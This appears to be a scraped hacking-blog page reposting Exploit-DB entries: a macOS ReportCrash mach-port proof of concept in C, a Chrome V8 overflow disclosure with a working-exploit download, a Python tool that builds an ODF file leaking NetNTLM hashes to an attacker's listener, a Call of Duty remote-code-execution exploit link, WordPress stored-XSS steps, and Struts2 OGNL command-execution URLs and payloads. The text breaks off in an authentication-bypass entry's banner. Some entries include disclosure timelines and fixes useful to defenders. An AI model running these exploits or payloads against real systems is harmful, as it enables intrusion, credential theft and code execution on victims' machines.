/*
ReportCrash is the daemon responsible for making crash dumps of crashing userspace processes.
Most processes can talk to ReportCrash via their exception ports (either task or host level.)
You would normally never send a message yourself to ReportCrash but the kernel would do it
on your behalf when you crash. However using the task_get_exception_ports or host_get_exception_ports
MIG kernel methods you can get a send right to ReportCrash.
ReportCrash implements a mach_exc subsystem (2405) server and expects to receive
mach_exception_raise_state_identity messages. The handler for these messages is at +0x2b11 in 10.13.3.
The handler compares its euid with the sender's; if they are different it jumps straight to the error path:
__text:0000000100002BD5 cmp rbx, rax
__text:0000000100002BD8 mov r14d, 5
__text:0000000100002BDE jnz loc_100002DCF
__text:0000000100002DCF mov rbx, cs:_mach_task_self__ptr
__text:0000000100002DD6 mov edi, [rbx] ; task
__text:0000000100002DD8 mov rsi, qword ptr [rbp+name] ; name
__text:0000000100002DDC call _mach_port_deallocate
__text:0000000100002DE1 mov edi, [rbx] ; task
__text:0000000100002DE3 mov esi, r12d ; name
__text:0000000100002DE6 call _mach_port_deallocate
__text:0000000100002DEB mov rax, cs:___stack_chk_guard_ptr
__text:0000000100002DF2 mov rax, [rax]
__text:0000000100002DF5 cmp rax, [rbp+var_30]
__text:0000000100002DF9 jnz loc_10000314E
__text:0000000100002DFF mov eax, r14d
This error path drops a UREF on the task and thread port arguments then returns error code 5.
MIG will see this error and drop another UREF on the thread and port arguments. As detailed in
the mach_portal exploit [https://bugs.chromium.org/p/project-zero/issues/detail?id=959] such bugs can
be used to replace privileged port names leading to exploitable conditions.
Since this path will only be triggered if you can talk to a ReportCrash running with a different euid
a plausible exploitation scenario would be trying to pivot from code execution in a sandbox root process
to another one with more privileges (eg kextd on MacOS or amfid on iOS) going via ReportCrash (as ReportCrash
will get sent their task ports if you can crash them.)
This PoC demonstrates the bug by destroying ReportCrash's send right to logd; use a debugger or lsmp to see
what's happening.
Tested on MacOS 10.13.3 17D47
*/
// ianbeer
#if 0
MacOS/iOS ReportCrash mach port replacement due to failure to respect MIG ownership rules
ReportCrash is the daemon responsible for making crash dumps of crashing userspace processes.
Most processes can talk to ReportCrash via their exception ports (either task or host level.)
You would normally never send a message yourself to ReportCrash but the kernel would do it
on your behalf when you crash. However using the task_get_exception_ports or host_get_exception_ports
MIG kernel methods you can get a send right to ReportCrash.
ReportCrash implements a mach_exc subsystem (2405) server and expects to receive
mach_exception_raise_state_identity messages. The handler for these messages is at +0x2b11 in 10.13.3.
The handler compares its euid with the sender's; if they are different it jumps straight to the error path:
__text:0000000100002BD5 cmp rbx, rax
__text:0000000100002BD8 mov r14d, 5
__text:0000000100002BDE jnz loc_100002DCF
__text:0000000100002DCF mov rbx, cs:_mach_task_self__ptr
__text:0000000100002DD6 mov edi, [rbx] ; task
__text:0000000100002DD8 mov rsi, qword ptr [rbp+name] ; name
__text:0000000100002DDC call _mach_port_deallocate
__text:0000000100002DE1 mov edi, [rbx] ; task
__text:0000000100002DE3 mov esi, r12d ; name
__text:0000000100002DE6 call _mach_port_deallocate
__text:0000000100002DEB mov rax, cs:___stack_chk_guard_ptr
__text:0000000100002DF2 mov rax, [rax]
__text:0000000100002DF5 cmp rax, [rbp+var_30]
__text:0000000100002DF9 jnz loc_10000314E
__text:0000000100002DFF mov eax, r14d
This error path drops a UREF on the task and thread port arguments then returns error code 5.
MIG will see this error and drop another UREF on the thread and port arguments. As detailed in
the mach_portal exploit [https://bugs.chromium.org/p/project-zero/issues/detail?id=959] such bugs can
be used to replace privileged port names leading to exploitable conditions.
Since this path will only be triggered if you can talk to a ReportCrash running with a different euid
a plausible exploitation scenario would be trying to pivot from code execution in a sandbox root process
to another one with more privileges (eg kextd on MacOS or amfid on iOS) going via ReportCrash (as ReportCrash
will get sent their task ports if you can crash them.)
This PoC demonstrates the bug by destroying ReportCrash's send right to logd; use a debugger or lsmp to see
what's happening.
Tested on MacOS 10.13.3 17D47
build: cp /usr/include/mach/mach_exc.defs . && mig mach_exc.defs && clang -o rc rc.c mach_excUser.c
run: sudo ./rc
#endif
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <servers/bootstrap.h>
#include <mach/mach.h>
#include <mach/task.h>
#include "mach_exc.h"
#include <mach/exception_types.h>
void drop_ref(mach_port_t report_crash_port, mach_port_t target_port) {
int flavor = 0;
mach_msg_type_number_t new_stateCnt = 0;
kern_return_t err = mach_exception_raise_state_identity(
report_crash_port,
target_port,
MACH_PORT_NULL,
0,
0,
0,
&flavor,
NULL,
0,
NULL,
&new_stateCnt);
}
int main() {
int uid = getuid();
if (uid != 0) {
printf("this PoC should be run as root\n");
return 0;
}
// take a look at our exception ports:
exception_mask_t masks[EXC_TYPES_COUNT] = {0};
mach_msg_type_number_t count = EXC_TYPES_COUNT;
mach_port_t ports[EXC_TYPES_COUNT] = {0};
exception_behavior_t behaviors[EXC_TYPES_COUNT] = {0};
thread_state_flavor_t flavors[EXC_TYPES_COUNT] = {0};
kern_return_t err = host_get_exception_ports(mach_host_self(),
//kern_return_t err = task_get_exception_ports(mach_task_self(),
EXC_MASK_ALL,
masks,
&count,
ports,
behaviors,
flavors);
if (err != KERN_SUCCESS) {
printf("failed to get the exception ports\n");
return 0;
}
printf("count: %d\n", count);
mach_port_t report_crash_port = MACH_PORT_NULL;
for (int i = 0; i < count; i++) {
mach_port_t port = ports[i];
exception_mask_t mask = masks[i];
printf("port: %x %08x\n", port, mask);
if (mask & (1 << EXC_RESOURCE)) {
report_crash_port = port;
}
}
if (report_crash_port == MACH_PORT_NULL) {
printf("couldn't find ReportCrash port\n");
return 0;
}
printf("report crash port: 0x%x\n", report_crash_port);
// the port we will target:
mach_port_t bs = MACH_PORT_NULL;
task_get_bootstrap_port(mach_task_self(), &bs);
printf("targeting bootstrap port: %x\n", bs);
mach_port_t service_port = MACH_PORT_NULL;
err = bootstrap_look_up(bs, "com.apple.logd", &service_port);
if(err != KERN_SUCCESS){
printf("unable to look up target service\n");
return 0;
}
printf("got service: 0x%x\n", service_port);
// triggering the bug requires that we send from a different uid
// drop to everyone(12)
int setuiderr = setuid(12);
if (setuiderr != 0) {
printf("setuid failed...\n");
return 0;
}
printf("dropped to uid 12\n");
drop_ref(report_crash_port, service_port);
return 0;
}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863569175
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
There's an integer overflow in computing the required allocation size when instantiating a new javascript object.
See the following code in objects.cc
// static
bool JSFunction::CalculateInstanceSizeForDerivedClass(
Handle<JSFunction> function, InstanceType instance_type,
int requested_embedder_fields, int* instance_size,
int* in_object_properties) {
Isolate* isolate = function->GetIsolate();
int expected_nof_properties = 0;
bool result = true;
for (PrototypeIterator iter(isolate, function, kStartAtReceiver);
!iter.IsAtEnd(); iter.Advance()) {
Handle<JSReceiver> current =
PrototypeIterator::GetCurrent<JSReceiver>(iter);
if (!current->IsJSFunction()) break;
Handle<JSFunction> func(Handle<JSFunction>::cast(current));
// The super constructor should be compiled for the number of expected
// properties to be available.
Handle<SharedFunctionInfo> shared(func->shared());
if (shared->is_compiled() ||
Compiler::Compile(func, Compiler::CLEAR_EXCEPTION)) {
DCHECK(shared->is_compiled());
expected_nof_properties += shared->expected_nof_properties(); // <--- overflow here!
} else if (!shared->is_compiled()) {
// In case there was a compilation error for the constructor we will
// throw an error during instantiation. Hence we directly return 0;
result = false;
break;
}
if (!IsDerivedConstructor(shared->kind())) {
break;
}
}
CalculateInstanceSizeHelper(instance_type, true, requested_embedder_fields,
expected_nof_properties, instance_size,
in_object_properties);
return result;
}
By supplying a long prototype chain of objects with a large expected_nof_properties we can control the resulting value of instance_size by causing (requested_embedder_fields + requested_in_object_properties) << kPointerSizeLog2 to be overflown to a small negative value, resulting in an allocation smaller than header_size, which is the minimum required size for the base object class being allocated. This results in memory corruption when the object is initialised/used.
void JSFunction::CalculateInstanceSizeHelper(InstanceType instance_type,
bool has_prototype_slot,
int requested_embedder_fields,
int requested_in_object_properties,
int* instance_size,
int* in_object_properties) {
int header_size = JSObject::GetHeaderSize(instance_type, has_prototype_slot);
DCHECK_LE(requested_embedder_fields,
(JSObject::kMaxInstanceSize - header_size) >> kPointerSizeLog2);
*instance_size =
Min(header_size +
((requested_embedder_fields + requested_in_object_properties)
<< kPointerSizeLog2),
JSObject::kMaxInstanceSize);
*in_object_properties = ((*instance_size - header_size) >> kPointerSizeLog2) -
requested_embedder_fields;
}
The attached PoC crashes current stable on linux.
See crash report ID: 307546648ba8a84a
Chrome issue is https://bugs.chromium.org/p/chromium/issues/detail?id=808192
Attaching the working exploit for this issue.
Note that issue_808192.html is a template - it requires server.py to do a version check and patch a few version dependent constants in, since some object layouts have changed during the range of Chrome versions on which the exploit was tested.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44584.zip
#!/usr/bin/python
# Exploit Title: Malicious ODF File Creator
# Date: 1st May 2018
# Exploit Author: Richard Davy
# Vendor Homepage: https://www.libreoffice.org/
# Software Link: https://www.libreoffice.org/
# Version: LibreOffice 6.0.3, OpenOffice 4.1.5
# Tested on: Windows 10
#
#Quick script/POC code to create a malicious ODF which can be used to leak NetNTLM credentials
#Usage - Setup responder or similar create a malicious file and point to listener.
#Works against LibreOffice 6.03 and OpenOffice 4.1.5
#
#
try:
from ezodf import newdoc
except ImportError:
print ('ezodf appears to be missing - try: pip install ezodf')
exit(1)
import os
import zipfile
import base64
print """
____ __ ____ ____ ______
/ __ )____ _____/ / / __ \/ __ \/ ____/
/ __ / __ `/ __ /_____/ / / / / / / /_
/ /_/ / /_/ / /_/ /_____/ /_/ / /_/ / __/
/_____/\__,_/\__,_/ \____/_____/_/
"""
print "Create a malicious ODF document help leak NetNTLM Creds"
print "\nBy Richard Davy "
print "@rd_pentest"
print "www.secureyourit.co.uk\n"
#Create a blank ODT file
namef = "temp.odt"
odt = newdoc(doctype='odt', filename=namef)
odt.save()
#Create our modified content.xml file
contentxml1="PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4NCjxvZmZpY2U6ZG9jdW1lbnQtY29udGVudCB4bWxuczpvZmZpY2U9InVybjpvYXNpczpuYW1lczp0YzpvcGVuZG9jdW1lbnQ6eG1sbnM6b2ZmaWNlOjEuMCIgeG1sbnM6c3R5bGU9InVybjpvYXNpczpuYW1lczp0YzpvcGVuZG9jdW1lbnQ6eG1sbnM6c3R5bGU6MS4wIiB4bWxuczp0ZXh0PSJ1cm46b2FzaXM6bmFtZXM6dGM6b3BlbmRvY3VtZW50OnhtbG5zOnRleHQ6MS4wIiB4bWxuczp0YWJsZT0idXJuOm9hc2lzOm5hbWVzOnRjOm9wZW5kb2N1bWVudDp4bWxuczp0YWJsZToxLjAiIHhtbG5zOmRyYXc9InVybjpvYXNpczpuYW1lczp0YzpvcGVuZG9jdW1lbnQ6eG1sbnM6ZHJhd2luZzoxLjAiIHhtbG5zOmZvPSJ1cm46b2FzaXM6bmFtZXM6dGM6b3BlbmRvY3VtZW50OnhtbG5zOnhzbC1mby1jb21wYXRpYmxlOjEuMCIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6bWV0YT0idXJuOm9hc2lzOm5hbWVzOnRjOm9wZW5kb2N1bWVudDp4bWxuczptZXRhOjEuMCIgeG1sbnM6bnVtYmVyPSJ1cm46b2FzaXM6bmFtZXM6dGM6b3BlbmRvY3VtZW50OnhtbG5zOmRhdGFzdHlsZToxLjAiIHhtbG5zOnN2Zz0idXJuOm9hc2lzOm5hbWVzOnRjOm9wZW5kb2N1bWVudDp4bWxuczpzdmctY29tcGF0aWJsZToxLjAiIHhtbG5zOmNoYXJ0PSJ1cm46b2FzaXM6bmFtZXM6dGM6b3BlbmRvY3VtZW50OnhtbG5zOmNoYXJ0OjEuMCIgeG1sbnM6ZHIzZD0idXJuOm9hc2lzOm5hbWVzOnRjOm9wZW5kb2N1bWVudDp4bWxuczpkcjNkOjEuMCIgeG1sbnM6bWF0aD0iaHR0cDovL3d3dy53My5vcmcvMTk5OC9NYXRoL01hdGhNTCIgeG1sbnM6Zm9ybT0idXJuOm9hc2lzOm5hbWVzOnRjOm9wZW5kb2N1bWVudDp4bWxuczpmb3JtOjEuMCIgeG1sbnM6c2NyaXB0PSJ1cm46b2FzaXM6bmFtZXM6dGM6b3BlbmRvY3VtZW50OnhtbG5zOnNjcmlwdDoxLjAiIHhtbG5zOm9vbz0iaHR0cDovL29wZW5vZmZpY2Uub3JnLzIwMDQvb2ZmaWNlIiB4bWxuczpvb293PSJodHRwOi8vb3Blbm9mZmljZS5vcmcvMjAwNC93cml0ZXIiIHhtbG5zOm9vb2M9Imh0dHA6Ly9vcGVub2ZmaWNlLm9yZy8yMDA0L2NhbGMiIHhtbG5zOmRvbT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS94bWwtZXZlbnRzIiB4bWxuczp4Zm9ybXM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDIveGZvcm1zIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczpycHQ9Imh0dHA6Ly9vcGVub2ZmaWNlLm9yZy8yMDA1L3JlcG9ydCIgeG1sbnM6b2Y9InVybjpvYXNpczpuYW1lczp0YzpvcGVuZG9jdW1lbnQ6eG1sbnM6b2Y6MS4yIiB4bWxuczp4aHRtbD0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCIgeG1sbnM6Z3JkZGw9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvZy9kYXRhLXZpZXcjIiB4bWxuczpvZmZpY2Vvb289Imh0dHA6Ly9vcGVub2ZmaWNlLm9yZy8yMDA5L29mZmljZSIgeG1sbnM6dGFibGVvb289Imh0dHA6Ly9vcGVub2ZmaWNlLm9yZy8yMDA5L3RhYmxlIiB4bWxuczpkcmF3b29vPSJodHRwOi8vb3Blbm9mZmljZS5vcmcvMjAxMC9kcmF3IiB4bWxuczpjYWxjZXh0PSJ1cm46b3JnOmRvY3VtZW50Zm91bmRhdGlvbjpuYW1lczpleHBlcmltZW50YWw6Y2FsYzp4bWxuczpjYWxjZXh0OjEuMCIgeG1sbnM6bG9leHQ9InVybjpvcmc6ZG9jdW1lbnRmb3VuZGF0aW9uOm5hbWVzOmV4cGVyaW1lbnRhbDpvZmZpY2U6eG1sbnM6bG9leHQ6MS4wIiB4bWxuczpmaWVsZD0idXJuOm9wZW5vZmZpY2U6bmFtZXM6ZXhwZXJpbWVudGFsOm9vby1tcy1pbnRlcm9wOnhtbG5zOmZpZWxkOjEuMCIgeG1sbnM6Zm9ybXg9InVybjpvcGVub2ZmaWNlOm5hbWVzOmV4cGVyaW1lbnRhbDpvb3htbC1vZGYtaW50ZXJvcDp4bWxuczpmb3JtOjEuMCIgeG1sbnM6Y3NzM3Q9Imh0dHA6Ly93d3cudzMub3JnL1RSL2NzczMtdGV4dC8iIG9mZmljZTp2ZXJzaW9uPSIxLjIiPjxvZmZpY2U6c2NyaXB0cy8+PG9mZmljZTpmb250LWZhY2UtZGVjbHM+PHN0eWxlOmZvbnQtZmFjZSBzdHlsZTpuYW1lPSJMdWNpZGEgU2FuczEiIHN2Zzpmb250LWZhbWlseT0iJmFwb3M7THVjaWRhIFNhbnMmYXBvczsiIHN0eWxlOmZvbnQtZmFtaWx5LWdlbmVyaWM9InN3aXNzIi8+PHN0eWxlOmZvbnQtZmFjZSBzdHlsZTpuYW1lPSJMaWJlcmF0aW9uIFNlcmlmIiBzdmc6Zm9udC1mYW1pbHk9IiZhcG9zO0xpYmVyYXRpb24gU2VyaWYmYXBvczsiIHN0eWxlOmZvbnQtZmFtaWx5LWdlbmVyaWM9InJvbWFuIiBzdHlsZTpmb250LXBpdGNoPSJ2YXJpYWJsZSIvPjxzdHlsZTpmb250LWZhY2Ugc3R5bGU6bmFtZT0iTGliZXJhdGlvbiBTYW5zIiBzdmc6Zm9udC1mYW1pbHk9IiZhcG9zO0xpYmVyYXRpb24gU2FucyZhcG9zOyIgc3R5bGU6Zm9udC1mYW1pbHktZ2VuZXJpYz0ic3dpc3MiIHN0eWxlOmZvbnQtcGl0Y2g9InZhcmlhYmxlIi8+PHN0eWxlOmZvbnQtZmFjZSBzdHlsZTpuYW1lPSJMdWNpZGEgU2FucyIgc3ZnOmZvbnQtZmFtaWx5PSImYXBvcztMdWNpZGEgU2FucyZhcG9zOyIgc3R5bGU6Zm9udC1mYW1pbHktZ2VuZXJpYz0ic3lzdGVtIiBzdHlsZTpmb250LXBpdGNoPSJ2YXJpYWJsZSIvPjxzdHlsZTpmb250LWZhY2Ugc3R5bGU6bmFtZT0iTWljcm9zb2Z0IFlhSGVpIiBzdmc6Zm9udC1mYW1pbHk9IiZhcG9zO01pY3Jvc29mdCBZYUhlaSZhcG9zOyIgc3R5bGU6Zm9udC1mYW1pbHktZ2VuZXJpYz0ic3lzdGVtIiBzdHlsZTpmb250LXBpdGNoPSJ2YXJpYWJsZSIvPjxzdHlsZTpmb250LWZhY2Ugc3R5bGU6bmFtZT0iU2ltU3VuIiBzdmc6Zm9udC1mYW1pbHk9IlNpbVN1biIgc3R5bGU6Zm9udC1mYW1pbHktZ2VuZXJpYz0ic3lzdGVtIiBzdHlsZTpmb250LXBpdGNoPSJ2YXJpYWJsZSIvPjwvb2ZmaWNlOmZvbnQtZmFjZS1kZWNscz48b2ZmaWNlOmF1dG9tYXRpYy1zdHlsZXM+PHN0eWxlOnN0eWxlIHN0eWxlOm5hbWU9ImZyMSIgc3R5bGU6ZmFtaWx5PSJncmFwaGljIiBzdHlsZTpwYXJlbnQtc3R5bGUtbmFtZT0iT0xFIj48c3R5bGU6Z3JhcGhpYy1wcm9wZXJ0aWVzIHN0eWxlOmhvcml6b250YWwtcG9zPSJjZW50ZXIiIHN0eWxlOmhvcml6b250YWwtcmVsPSJwYXJhZ3JhcGgiIGRyYXc6b2xlLWRyYXctYXNwZWN0PSIxIi8+PC9zdHlsZTpzdHlsZT48L29mZmljZTphdXRvbWF0aWMtc3R5bGVzPjxvZmZpY2U6Ym9keT48b2ZmaWNlOnRleHQ+PHRleHQ6c2VxdWVuY2UtZGVjbHM+PHRleHQ6c2VxdWVuY2UtZGVjbCB0ZXh0OmRpc3BsYXktb3V0bGluZS1sZXZlbD0iMCIgdGV4dDpuYW1lPSJJbGx1c3RyYXRpb24iLz48dGV4dDpzZXF1ZW5jZS1kZWNsIHRleHQ6ZGlzcGxheS1vdXRsaW5lLWxldmVsPSIwIiB0ZXh0Om5hbWU9IlRhYmxlIi8+PHRleHQ6c2VxdWVuY2UtZGVjbCB0ZXh0OmRpc3BsYXktb3V0bGluZS1sZXZlbD0iMCIgdGV4dDpuYW1lPSJUZXh0Ii8+PHRleHQ6c2VxdWVuY2UtZGVjbCB0ZXh0OmRpc3BsYXktb3V0bGluZS1sZXZlbD0iMCIgdGV4dDpuYW1lPSJEcmF3aW5nIi8+PC90ZXh0OnNlcXVlbmNlLWRlY2xzPjx0ZXh0OnAgdGV4dDpzdHlsZS1uYW1lPSJTdGFuZGFyZCIvPjx0ZXh0OnAgdGV4dDpzdHlsZS1uYW1lPSJTdGFuZGFyZCI+PGRyYXc6ZnJhbWUgZHJhdzpzdHlsZS1uYW1lPSJmcjEiIGRyYXc6bmFtZT0iT2JqZWN0MSIgdGV4dDphbmNob3ItdHlwZT0icGFyYWdyYXBoIiBzdmc6d2lkdGg9IjE0LjEwMWNtIiBzdmc6aGVpZ2h0PSI5Ljk5OWNtIiBkcmF3OnotaW5kZXg9IjAiPjxkcmF3Om9iamVjdCB4bGluazpocmVmPSJmaWxlOi8v"
contentxml2=raw_input("\nPlease enter IP of listener: ")
contentxml3="L3Rlc3QuanBnIiB4bGluazp0eXBlPSJzaW1wbGUiIHhsaW5rOnNob3c9ImVtYmVkIiB4bGluazphY3R1YXRlPSJvbkxvYWQiLz48ZHJhdzppbWFnZSB4bGluazpocmVmPSIuL09iamVjdFJlcGxhY2VtZW50cy9PYmplY3QgMSIgeGxpbms6dHlwZT0ic2ltcGxlIiB4bGluazpzaG93PSJlbWJlZCIgeGxpbms6YWN0dWF0ZT0ib25Mb2FkIi8+PC9kcmF3OmZyYW1lPjwvdGV4dDpwPjwvb2ZmaWNlOnRleHQ+PC9vZmZpY2U6Ym9keT48L29mZmljZTpkb2N1bWVudC1jb250ZW50Pg=="
fileout=base64.b64decode(contentxml1)+contentxml2+base64.b64decode(contentxml3)
text_file = open("content.xml", "w")
text_file.write(fileout)
text_file.close()
#Create a copy of the blank odt file without the content.xml file in (odt files are basically a zip)
zin = zipfile.ZipFile ('temp.odt', 'r')
zout = zipfile.ZipFile ('bad.odt', 'w')
for item in zin.infolist():
buffer = zin.read(item.filename)
if (item.filename != 'content.xml'):
zout.writestr(item, buffer)
zout.close()
zin.close()
#Add our modified content.xml file to our odt file
zf = zipfile.ZipFile('bad.odt', mode='a')
try:
zf.write('content.xml', arcname='content.xml')
finally:
zf.close()
#Clean up temp files
os.remove("content.xml")
os.remove("temp.odt")
A few years ago, I became aware of a security issue in most Call of Duty games.
Although I did not discover it myself, I thought it might be interesting to see what it could be used for.
Without going into detail, this security issue allows users playing a Call of Duty match to cause a buffer overflow on the host’s system inside a stack-allocated buffer within the game’s network handling.
In consquence, this allows full remote code execution!
The code has been published as the vulnerability used has been patched on all cod games as of 4/26/2018.
For more information, read the post at https://momo5502.com/blog/?p=34
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44582.zip
# Exploit Title: Wordpress Responsive Cookie Consent 1.7 / 1.6 / 1.5 - Authenticated Persistent Cross-Site Scripting
# Date: 2018-04-20
# Exploit Author: B0UG
# Vendor Homepage: http://www.jameskoussertari.co.uk/
# Software Link: https://en-gb.wordpress.org/plugins/responsive-cookie-consent/
# Version: Tested on version 1.5 / 1.6 /1.7 (older versions may also be affected)
# Tested on: WordPress
# Category : Webapps
# CVE: CVE-2018-10309
#I. VULNERABILITY
Authenticated Persistent Cross-Site Scripting
#II. BACKGROUND
Responsive Cookie Consent is open source software kindly developed by James Koussertari to display cookie consent notifications on a WordPress website.
#III. DESCRIPTION
A authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site.
#IV. PROOF OF CONCEPT
1) Access WordPress control panel.
2) Navigate to the Responsive Cookie Consent plugin page.
3) Select one of the input fields. For example, "Cookie Bar Border Bottom Size".
4) Insert the script you wish to inject.
5) Save the plugin settings.
6) Injected script will run in the victim's browser. Depending on which input field you inserted the script, the script may also run everytime you load the Responsive Cookie Consent plugin page.
#V. IMPACT
An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.
#VI. SYSTEMS AFFECTED
WordPress websites running "Responsive Cookie Consent" plugin version 1.5 (older versions may also be affected).
#VII. REMEDIATION
Update to the latest version available. Implement a web application such as Wordfence.
#VIII. DISCLOSURE TIMELINE
#February 8, 2018 1: Vulnerability identified.
#February 8, 2018 2: Informed developer of the vulnerability.
#February 8, 2018 2: Developer acknowledged the vulnerability.
#February 10, 2018 2: Developer issued a security patch.
#February 12, 2018 2: Informed developer of further vulnerabilities.
#February 13, 2018 2: Developer issued a further two security patches.
CVE Number: CVE-2013-2251
Title: Struts2 Prefixed Parameters OGNL Injection Vulnerability
Affected Software: Apache Struts v2.0.0 - 2.3.15
Credit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
Issue Status: v2.3.15.1 was released which fixes this vulnerability
Issue ID by Vender: S2-016
Overview:
Struts2 is an open-source web application framework for Java.
Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which
leads to arbitrary Java method execution on the target server. This is
caused by insecure handling of prefixed special parameters (action:,
redirect: and redirectAction:) in DefaultActionMapper class of Struts2.
Details:
<About DefaultActionMapper>
Struts2's ActionMapper is a mechanism for mapping between incoming HTTP
request and action to be executed on the server. DefaultActionMapper is
a default implementation of ActionMapper. It handles four types of
prefixed parameters: action:, redirect:, redirectAction: and method:.
For example, redirect prefix is used for HTTP redirect.
Normal redirect prefix usage in JSP:
<s:form action="foo">
...
<s:submit value="Register"/>
<s:submit name="redirect:http://www.google.com/" value="Cancel"/>
</s:form>
If the cancel button is clicked, redirection is performed.
Request URI for redirection:
/foo.action?redirect:http://www.google.com/
Resopnse Header:
HTTP/1.1 302 Found
Location: http://www.google.com/
Usage of other prefixed parameters is similar to redirect.
See Struts2 document for details.
https://cwiki.apache.org/confluence/display/WW/ActionMapper
<How the Attack Works>
As stated already, there are four types of prefixed parameters.
action:, redirect:, redirectAction:, method:
All except for method: can be used for attacks. But regarding action:,
it can be used only if wildcard mapping is enabled in configuration.
On the one hand, redirect: and redirectAction: are not constrained by
configuration (thus they are convenient for attackers).
One thing that should be noted is that prefixed parameters are quite
forceful. It means that behavior of application which is not intended
to accept prefixed parameters can also be overwritten by prefixed
parameters added to HTTP request. Therefore all Struts2 applications
that use DefaultActionMapper are vulnerable to the attack.
The injection point is name of prefixed parameters.
Example of attack using redirect: is shown below.
Attack URI:
/bar.action?redirect:http://www.google.com/%25{1000-1}
Response Header:
HTTP/1.1 302 Found
Location: http://www.google.com/999
As you can see, expression (1000-1) is evaluated and the result (999)
is appeared in Location response header. As I shall explain later,
more complex attacks such as OS command execution is possible too.
In DefaultActionMapper, name of prefixed parameter is once stored as
ActionMapping object and is later executed as OGNL expression.
Rough method call flow in execution phase is as the following.
org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()
org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()
org.apache.struts2.dispatcher.Dispatcher.serviceAction()
org.apache.struts2.dispatcher.StrutsResultSupport.execute()
org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()
com.opensymphony.xwork2.util.TextParseUtil.translateVariables()
com.opensymphony.xwork2.util.OgnlTextParser.evaluate()
Proof of Concept:
<PoC URLs>
PoC is already disclosed on vender's web page.
https://struts.apache.org/release/2.3.x/docs/s2-016.html
Below PoC URLs are just quotes from the vender's page.
Simple Expression:
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
OS Command Execution:
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
Obviously such attacks are not specific to blank/showcase application,
but all Struts2 based applications may be subject to attacks.
<OS Command Execution and Static Method Call>
Another topic that I think worth mentioning is that PoC URLs use
ProcessBuilder class to execute OS commands. The merit of using this
class is that it does not require static method to execute OS commands,
while Runtime class does require it.
As you may know, static method call in OGNL is basically prohibited.
But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by
a simple trick:
%{#_memberAccess['allowStaticMethodAccess']=true,
@java.lang.Runtime@getRuntime().exec('your commands')}
In Struts v2.3.14.2, SecurityMemberAccess class has been changed to
prevent the trick. However there are still some techniques to call
static method in OGNL.
One technique is to use reflection to replace static method call to
instance method call. Another technique is to overwrite #_memberAccess
object itself rather than property of the object:
%{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),
@java.lang.Runtime@getRuntime().exec('your commands')}
Probably prevention against static method is just an additional layer
of defense, but I think that global objects such as #_memberAccess
should be protected from rogue update.
Timeline:
2013/06/24 Reported to Struts Security ML
2013/07/17 Vender announced v2.3.15.1
2013/08/10 Disclosure of this advisory
Recommendation:
Immediate upgrade to the latest version is strongly recommended as
active attacks have already been observed. It should be noted that
redirect: and redirectAction: parameters were completely dropped and
do not work in the latest version as stated in the vender's page.
Thus attention for compatibility issues is required for upgrade.
If you cannot upgrade your Struts2 immediately, filtering (by custom
servlet filter, IPS, WAF and so on) can be a mitigation solution for
this vulnerability. Some points about filtering solution are listed
below.
- Both %{expr} and ${expr} notation can be used for attacks.
- Parameters both in querystring and in request body can be used.
- redirect: and redirectAction: can be used not only for Java method
execution but also for open redirect.
See S2-017 (CVE-2013-2248) for open redirect issue.
https://struts.apache.org/release/2.3.x/docs/s2-017.html
Reference:
https://struts.apache.org/release/2.3.x/docs/s2-016.html
https://cwiki.apache.org/confluence/display/WW/ActionMapper
# Exploit Title: CSP MySQL User Manager 2.3.1 - Authentication Bypass
# Date: 2018-05-04
# Exploit Author: Youssef mami
# Vendor Homepage: https://code.google.com/archive/p/cspmum/
# Software Link: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
# Version: 2.3.1
# Tested on: Linux 2.6.38-11
# CVE : CVE-2018-10757
##################################################################################
.__ __
| |__ _____ _____ _____ _____ _____ _____/ |_
| | \\__ \ / \ / \\__ \ / \_/ __ \ __\
| Y \/ __ \| Y Y \ Y Y \/ __ \| Y Y \ ___/| |
|___| (____ /__|_| /__|_| (____ /__|_| /\___ >__|
\/ \/ \/ \/ \/ \/ \/
.__ _____ __ .__
